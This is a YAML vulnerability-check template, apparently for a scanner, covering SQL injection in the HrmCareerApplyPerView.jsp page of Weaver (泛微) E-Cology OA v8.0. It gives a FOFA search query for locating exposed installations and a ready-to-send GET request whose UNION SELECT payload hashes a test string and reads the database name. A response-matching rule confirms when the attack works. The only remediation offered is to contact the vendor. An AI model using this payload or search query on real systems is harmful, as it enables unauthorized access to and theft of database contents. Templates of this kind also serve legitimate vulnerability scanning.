product: 泛微E-Cology
vName: 泛微E-Cology HrmCareerApplyPerView.jsp SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 泛微OA E-Cology HrmCareerApplyPerView.jsp 文件存在SQL注入漏洞，攻击者通过漏洞可以获取服务器数据库敏感文件
version: 泛微OA E-Cology v8.0
note: ''
search:
  FOFA: app="泛微-OA（e-cology）"
protocol: http
link: https://www.cnblogs.com/pursue-security/p/17677268.html
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1 union select 1,2,sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),db_name(1),5,6,7
    verify:
      path: ''
      logic: and
      check:
        - status: 200
        - body:
            value:
              - e10adc3949ba59abbe56e057f20f883e
            logic: and